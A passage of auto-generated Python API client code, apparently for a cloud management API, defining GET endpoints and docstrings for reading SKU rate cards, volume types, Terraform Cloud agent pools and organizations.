'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_network_type_list
)
def __get_cloud_sku_region_rate_cards_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.SkuRegionRateCards' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_region_rate_cards_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuRegionRateCards
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_region_rate_cards_by_moid = _Endpoint(
settings={
'response_type': (CloudSkuRegionRateCards,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuRegionRateCards/{Moid}',
'operation_id': 'get_cloud_sku_region_rate_cards_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_region_rate_cards_by_moid
)
def __get_cloud_sku_region_rate_cards_list(
self,
**kwargs
):
"""Read a 'cloud.SkuRegionRateCards' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_region_rate_cards_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuRegionRateCardsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_region_rate_cards_list = _Endpoint(
settings={
'response_type': (CloudSkuRegionRateCardsResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuRegionRateCards',
'operation_id': 'get_cloud_sku_region_rate_cards_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_region_rate_cards_list
)
def __get_cloud_sku_volume_type_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.SkuVolumeType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_volume_type_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuVolumeType
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_volume_type_by_moid = _Endpoint(
settings={
'response_type': (CloudSkuVolumeType,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuVolumeTypes/{Moid}',
'operation_id': 'get_cloud_sku_volume_type_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_volume_type_by_moid
)
def __get_cloud_sku_volume_type_list(
self,
**kwargs
):
"""Read a 'cloud.SkuVolumeType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_volume_type_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuVolumeTypeResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_volume_type_list = _Endpoint(
settings={
'response_type': (CloudSkuVolumeTypeResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuVolumeTypes',
'operation_id': 'get_cloud_sku_volume_type_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_volume_type_list
)
def __get_cloud_tfc_agentpool_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.TfcAgentpool' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_agentpool_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcAgentpool
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_agentpool_by_moid = _Endpoint(
settings={
'response_type': (CloudTfcAgentpool,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcAgentpools/{Moid}',
'operation_id': 'get_cloud_tfc_agentpool_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_agentpool_by_moid
)
def __get_cloud_tfc_agentpool_list(
self,
**kwargs
):
"""Read a 'cloud.TfcAgentpool' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_agentpool_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcAgentpoolResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_agentpool_list = _Endpoint(
settings={
'response_type': (CloudTfcAgentpoolResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcAgentpools',
'operation_id': 'get_cloud_tfc_agentpool_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_agentpool_list
)
def __get_cloud_tfc_organization_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.TfcOrganization' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_organization_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcOrganization
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_organization_by_moid = _Endpoint(
settings={
'response_type': (CloudTfcOrganization,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcOrganizations/{Moid}',
'operation_id': 'get_cloud_tfc_organization_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_organization_by_moid
)
def __get_cloud_tfc_organization_list(
self,
**kwargs
):
"""Read a 'cloud.TfcOrganization' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_organization_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcOrganizationResponse
